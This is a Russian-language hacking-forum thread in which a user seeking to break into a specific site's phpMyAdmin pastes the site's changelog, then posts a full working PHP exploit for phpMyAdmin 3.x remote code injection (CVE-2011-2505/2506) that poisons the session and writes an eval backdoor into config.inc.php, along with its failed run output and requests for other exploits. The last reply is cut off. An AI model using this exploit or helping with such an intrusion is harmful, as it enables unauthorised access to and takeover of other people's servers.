не могу найти сплойт под phpmyadmin

Discussion in 'Болталка' started by asiaman, 7 Apr 2012.

  1. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    сплойт под phpmyadmin

    Доброго времени суток. Мучаюсь над phpmyadmin.
    Не откажите в любезности, пожалуйста, посоветовать эксплойт для этого phpmyadmin (или несколько, которые подойдут). Сам поискал. Вроде ничего((

    Скрин со сканера.

    [​IMG]

    Файл http://www.siteexample.com/phpmyadmin/changelog.php

    Code:
    phpMyAdmin - ChangeLog
    
    ----------------------
    phpMyAdmin - ChangeLog
    ----------------------
    
    $Id$
    $HeadURL: https://phpmyadmin.svn.sourceforge.net/svnroot/phpmyadmin/trunk/phpMyAdmin/ChangeLog $
    
    3.3.7.0 (2010-09-07)
    - patch #3050492 [PDF scratchboard] Cannot drag table box to the edge after
      a page size increase, thanks to Martin Schönberger
    - bug #3054458 [core] Fixed displaying number of rows.
    - bug #3035300 [parser] Fixed wrong definition of keywords.
    - [setup] Fixed escaping of server name.
    
    3.3.6.0 (2010-08-28)
    - bug #3033063 [core] Navi gets wrong db name
    - bug #3031705 [core] Fix generating condition for real numbers by comparing
      them to string.
    - bug #3034026 [confirmation] TRUNCATE queries get no confirmation request
    - bug #3036132 [core] Triggers not fetched if dbname has an hyphen
    - patch #3039269 [dbi] Wrong variable checked for nopassword option,
      thanks to Will Palmer
    - bug #3040226 [XHTML] LockFromUpdate checkbox not checked by default
    - bug [doc] Withdraw or edit FAQ entries related to older MySQL or PHP 
    - bug #3042706 [pmadb] Relations, bookmarks, etc deleted after table drop
    - bug #3044189 [doc] Cleared documentation for hide_db.
    - bug #3042495 [core] Move PMA_sendHeaderLocation to core.lib.php.
    
    3.3.5.1 (2010-08-20)
    - [core] Fixed various XSS issues, see PMASA-2010-5 for more details.
    
    3.3.5.0 (2010-07-26)
    - patch #2932113 [information_schema] Slow export when having lots of
      databases, thanks to Stéphane Pontier
    - bug #3022705 [import] Import button does not work in Catalan when there
      is no progress bar possible
    - bug [replication] Do not offer information_schema in the list of databases
    - bug [js] Avoid loading twice a js file
    - bug #3024344 [setup] Setup forces numeric MemoryLimit
    - bug #3025975 [auth] Odd LoginCookieValidity default value
    - bug #3026400 [PHP] ereg functions are deprecated
    - bug #3027557 [PHP] split() deprecated in PHP 5.3 (backport fixes from master)
    - bug #3023507 [core] No result set display from stored procedure SELECT
    - bug [export] CSV for MS Excel (Windows) should have semi-colon as separator
    - [core] Update library PHPExcel to version 1.7.3c
    - bug #2994885, bug #3029168 [import] Convert Excel column name correctly
    - bug [scripts] MySQL 5.5.5 does not accept TIMESTAMP(14) in create_tables.sql
    
    3.3.4.0 (2010-06-28)
    - bug #2996161 [import] properly escape import value
    - bug #2998889 [import] Import button does not work in Catalan
    - [browse] Fix handling of sort order if only column is specified.
    + [lang] Greek update, thanks to Panagiotis Papazoglou
    + [lang] Updated lot of translation based on work done in master branch.
    - bug #3008411 [databases] Last dropped database remains active in navi
    - bug #2986383 [parser] Not all data being shown / counted
    - bug [synchronize] Rows were deleted in target table regardless of the
      "Would you like to delete..." option
    - bug [privileges] List of tables not shown when the db name has a wildcard
    - bug #3011126 [display] Edit link missing after long query
    - patch #3013264 [doc] FAQ 1.40 uses a comma instead of a period,
      thanks to Isaac Bennetch
    - [engines] Fix getting InnoDB status.
    - bug #2986422 [import] Results for query are not displayed
    
    3.3.3.0 (2010-05-10)
    - patch #2982480 [navi] Do not group if there would be one table in group,
      thanks to Lorikeet Lee.
    - patch #2983492 [sync] When asking to synchronize Structure and Data,
      only Structure is done, thanks to Ankit Gupta
    - patch #2984893 [engines] InnoDB storage page emits a warning,
      thanks to Madhura Jayaratne
    - bug #2974687, bug #2974692 [compatibility] PHPExcel : IBM AIX iconv() does not work,
      thanks to Björn Wiberg
    - bug #2983066 [interface] Flush table on table operations shows the query twice, 
      thanks to Martynas Mickevičius
    - bug #2983060, patch #2987900 [interface] Fix initial state of tables in
      designer, thanks to Sutharshan Balachandren.
    - bug #2983062, patch #2989408 [engines] Fix warnings when changing table
      engine to Maria, thanks to Madhura Jayaratne.
    - bug #2974067 [display] non-binary fields shown as hex
    - bug #2983065 [operations] Error when changing from Maria to MyISAM engine
    - bug #2975408 [tracking] Data too long for column data_sql
    - bug [tracking] Tracking report should obey MaxCharactersInDisplayedSQL 
    - bug [edit] Avoid selecting UNHEX function by default for a BLOB column for
      which editing is protected
    - bug #2994168 [structure] Show auto_increment in uppercase 
    - bug #2993970 [pdf schema] Page numbering in Table of Contents 
    
    3.3.2.0 (2010-04-13)
    - patch #2969449 [core] Name for MERGE engine varies depending on the
      MySQL version, thanks to Dieter Adriaenssens
    - bug #2966078 [browse] Incorrect LIMIT is saved and sticks while browsing
    - bug #2967366 [Structure] Some results of Propose table structure are
      shown in hex
    - bug #2967565 [insert] UNHEX not selected by default when inserting BINARY
    - [navi] Changed link to git repository on main page
    - bug #2972232 [menu] Import menu tab not present on main page
    - patch #2976790 [menu] Go to the upper level after table DROP,
      thanks to Kaarel Nummert
    - patch #2978815 [pdf] Fix generating PDF with table dimensions, thanks to BlinK_
    - patch #2977725 [export] XML wrongly encoded, thanks to Victor Volkov
    - patch #2979234 [import] Create tables with current charset and collation.
    - patch #2979234, bug #2960105 [import] Properly import unicode text from ODS.
    - bug #2973280 [export] Proper handling of temporary directory in XLS export.
    - bug #2980582 [interface] Properly format server status parameter.
    - bug #2973949 [session] SQL History broken (revert patch #2899969),
      thanks to Dieter Adriaenssens
    - [doc] Be more specific about problems with Suhosin.
    
    3.3.1.0 (2010-03-16)
    - bug #2941037 [core] Database structure not sorted by table correctly 
    - bug #2948492 [interface] Slide effect masks some fields on search page
    - bug #2959746 [interface] Unknown table status: TABLE_TYPE 
    - bug #2953050 [export] export VIEW as SQL includes INSERT statement 
    - bug #2942032 [core] Cannot detect PmaAbsoluteUri correctly on Windows 
    - bug #2961609 [auth] Potential information disclosure at login page
    - patch #2961540 [export] Do not export data of MERGE table,
      thanks to Dieter Adriaenssens
    - bug #2961198 [parser] Querying a table named "data"
    - bug #2931429 [structure] Editing long triggers
    - bug #2970769 [structure] Incorrect reference to mootools-more.js 
    
    3.3.0.0 (2010-03-07)
    + RFE #2308632 [edit] Use hex for (var)binary fields,
      thanks to Maarten Dieleman
    + patch #2794819 [navi] Filter for displayed table names,
      thanks to Michael Valushko
    - bug #2794840 [core] Cannot redeclare pma_tableheader() 
    - RFE #2726479 [core] configurable maximal length of URL
    + patch #2724755 [display] Full/partial text links (big T) are back,
      thanks to nullbarriere 
    - bug [display] handle NavigationBarIconic as documented for navi buttons
    + RFE #2726479 [export] Export tables preselect
    + patch #2805828 [export] PHP array export plugin, 
      thanks to Geoffray Warnants
    + patch #2798592 [import] Progress bar, 
      thanks to Tomas Srnka
    - bug [gui] Generate Password not working for 'Change Login Information', only for 'Change password'
    + [lang] Arabic update, thanks to Meno25 
    + RFE #2822190 [structure] BOOLEAN is standard SQL 
    + [lang] German update, thanks to knittl
    + [lang] German update, thanks to virsacer
    + RFE #2813867 [structure] Default sorting order in list of tables
    + [import] Added MySQL type-detection functionality to import library,
      thanks to Derek Schaefer
    + [import] Added ODS, Excel XLS, Excel XLSX, and XML import modules,
      thanks to Derek Schaefer
    + [export] Added Excel XLSX export module,
      thanks to Derek Schaefer
    + [core] Added ability for tracking changes made through phpMyAdmin
    + RFE #2839504 [engines] Support InnoDB plugin's new row formats 
    + [core] Added ability for synchronizing databases among servers.
    + [lang] bug #2843101 Dutch update, thanks to scavenger2008
    + [lang] Galician update, thanks to Xosé Calvo
    + [export] Added MediaWiki export module,
      thanks to Derek Schaefer
    + [lang] Turkish update, thanks to Burak Yavuz
    + [auth] Add custom port configuration in signon, thanks to Gary Smith
    - [core] Removed context from the error handler 
    - bug #2883633 [export] Export of InnoDB table is incomplete 
    + RFE #2862575 [status] Order query statistics by % desc, skip rows with 0 
    + RFE #2823686 [interface] Increase default height of query window 
    + RFE #2129902 [structure] Don't hide indexes 
    + patch #2812070 [interface] Allow selecting a range of rows by holding shift, thanks to Joolee
    + [lang] Russian update, thanks to Victor Volkov
    + [lang] Greek update, thanks to Panagiotis Papazoglou
    + [lang] Norwegian update, thanks to Sven-Erik Andersen 
    - bug #2929958 [import] Cannot import (French interface) 
    - [security] Use X-Frame-Options header to protect against ClickJacking.
    + [lang] Finnish update, thanks to Jouni Kahkonen
    + [lang] Lithuanian update, thanks to Rytis Slatkevicius 
    - bug #2931939 [status] Seeing "m" as unit is confusing 
    - bug #2926613 [edit] Copy database shows errors when DB has foreign key
    + [lang] Catalan update, thanks to Xavier Navarro
    
    3.2.6.0 (not released)
    - bug #2938492 [display] information_schema sorting order 
    - bug #2941101 [import] import timeout when table already created and
      several data lines
    - bug #2944069 [config] Extraneus dot from dirname() when installed in root, thanks to ayanamist
    
    3.2.5.0 (2010-01-10)
    - patch #2903400 [bookmarks] Status of bookmark table, 
      thanks to Virsacer 
    - bug [history] QueryHistoryDB is not respected
    - bug #2905629 [auth] Blowfish secret is not hashed
    - bug #2910000 [gui] ShowServerInfo should hide all server info from main page
    - bug #2910568 [structure] Table size for ARCHIVE tables is not displayed 
    - patch #2899969 [core] Session lock blocks working from a second window,
      thanks to Greg Roach
    - patch #2915168 [import] Incorrect parsing of DELIMITER keyword,
      thanks to Greg Roach
    - patch #2918831 [export] Missing backquotes on reserved words, 
      thanks to Virsacer 
    - [core] Fix broken cleanup of $_GET
    - bug #2924357 [operations] Cannot rename a database that has foreign key
      constraints
    - bug #869006 [structure] Ignore number of records for MRG_MyISAM tables
    - bug [browse] "Show BLOB contents" should display HTML code that is present
      in a BLOB, thanks to Vincent van der Tuin
    - [privileges] Improve escaping of hostname
    
             --- Older ChangeLogs can be found on our project website ---
                         http://www.phpmyadmin.net/old-stuff/ChangeLogs/
    
    # vim: et ts=4 sw=4 sts=4
    # vim: ft=changelog fenc=utf-8 encoding=utf-8
    # vim: fde=getline(v\:lnum-1)=~'^\\s*$'&&getline(v\:lnum)=~'\\S'?'>1'\:1&&v\:lnum>8&&getline(v\:lnum)!~'^#'
    # vim: fdn=1 fdm=expr
    
     
    #1 asiaman, 7 Apr 2012
    Last edited: 7 Apr 2012
  2. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Вот единственный сплойт, который вроде как должен подойти.

    http://en.securitylab.ru/nvd/409329.php

    Code:
    <?php /*
    # Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
    # Date: 2011-07-09
    # Author: Mango of ha.xxor.se
    # Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
    # CVE : CVE-2011-2505, CVE-2011-2506
    # Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
    # Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
    */
    echo php_sapi_name()!=='cli'?'<pre>':'';?>
                  .
           ,      )\     .
      .  ,/)   , /  ) ,  )\
      )\(  /)/( (__( /( /  )          __      __              ________        __                    __
     /  \  (   )|  |)  \  /          |  |\  /|  |            |  |  |  |      |  |                  (__)
    (  ______ / |  |_____(  ______   |  | \/ |  |  __    __  |  |__|  |   ___|  |  __ ___________   __   __ _____
     \|  | \  \ |  |  |  |)|  | \  \ |  |    |  | |  |  |  | |  |  |  | /  / |  | |  |  |  |  |  | |  | |  |  |  |
      |  |_/__/ |__|  |__| |  |_/__/ |__|    |__| |__|__|  | |__| [][]|[]__[]|[][]|_[]  |_[][]|_[] [][][]__|  |__|
    ==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]==============   
       phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1              [][]   []   [][]  []   []  [] []   []
       Remote Code Injection                                      []    [][]  []    []   []  [] []   []
       http://ha.xxor.se                                          [][] []  [] []    [][]  [][]  []   []
         _   _  ___ __ ____ __ ___  ___      
        | |-| || _ |\   /\   /| _ ||   )     
        |_|-|_||_|_|/_._\/_._\|___||_|_\     
      ___  ___  ___ _  _  ___     ___ __ __ 
     (  < | [_ /  /| || ||   )(_)|   |\ | /
      >__)|_[_ \__\|____||_|_\|_| |_|  |_|
     
    Use responsibly.
     
    <?php echo php_sapi_name()!=='cli'?'</pre>':'';
     
    if(php_sapi_name()==='cli'){
        if(!isset($argv[1])){
            output("   Usage\n    ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
            killme();
        }
        $pmaurl = $argv[1];
    }else{
        $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
    }
    $code   = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
    $cookie = null;
    $token  = null;
    if(!function_exists('curl_init')){
        output('[!] Fatal error. Need cURL!');
        killme();
    }
    $ch     = curl_init();
    $debug  = 0;
    if(php_sapi_name()!=='cli'){
    ?>
    <form method=post>
    URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: /phpMyAdmin-3.3.9.2<br/>
    <input name=submit type=submit value=?>
    </form>
    <pre>
    <?php
    if(!isset($_REQUEST['submit']))killme(true);
    }
     
    output("[i] Running...");
     
    // Start a session and get a token
    curl_setopt_array($ch, array(
        CURLOPT_URL => $pmaurl.'/setup/index.php',
        CURLOPT_HEADER => 1,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_TIMEOUT => 4,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false
    ));
    output("[*] Contacting server to retrive session cookie and token.");
     
    $result = curl_exec($ch);
    if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
        output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
        killme();
    }
    if(!$result){
        output("[!] cURL error:".curl_error($ch));
        killme();
    }
    if(false !== strpos($result, 'Cannot load or save configuration')){
        output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
        killme();
    }
     
    // Extract cookie
    preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
    $cookie = $matches[1];
    output("[i] Cookie:".$cookie);
    // Extract token
    preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
    $token = $matches[2];
    output("[i] Token:".$token);
     
    // Poison _SESSION variable
    curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
    curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
    output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
    if(!$result = curl_exec($ch)){
        output("[!] cURL error:".curl_error($ch));
        killme();
    }
     
    //echo htmlspecialchars($result,ENT_QUOTES);
     
    // Save file
    curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
    output("[*] Contacting server to make it save the injected code to a file.");
    if(!$result = curl_exec($ch)){
        output("[!] cURL error:".curl_error($ch));
        killme();
    }
     
    //echo htmlspecialchars($result,ENT_QUOTES);
     
    curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
    curl_setopt($ch, CURLOPT_POST, 0);
    output("[*] Contacting server to test if the injected code executes.");
    if(!$result = curl_exec($ch)){
        output("[!] cURL error:".curl_error($ch));
        killme();
    }
    if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
        output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
        output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
    }else{
        output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
    }
     
     
    curl_close($ch);
     
    function output($msg){
        echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
        flush();
    }
     
    function killme(){
        output("[*] Exiting...");
        echo php_sapi_name()!=='cli'?'<pre>':'';
        die();
    }
     
    echo php_sapi_name()!=='cli'?'<pre>':'';?>
    
    Залил на сервер. Открыл. Втавил линк http://www.siteexample.com:80/phpmyadmin

    И получил ответ:

    Code:
    [i] Running...
    [*] Contacting server to retrive session cookie and token.
    [i] Cookie: 
    [i] Token: 
    [*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array. 
    [*] Contacting server to make it save the injected code to a file. 
    [*] Contacting server to test if the injected code executes. 
    [!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.
    
    Вопросы:
    1. Я посмотрел сплойт. Ничего не менял. Если там ошибки?
    2. По идеи сплойт должен сработать. В чем причина, что он не работает или что я делаю не так?
    3. Посоветуйте еще подходящие сплойты.
     
  3. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    375
    Likes Received:
    73
    Reputations:
    38
    Как бы...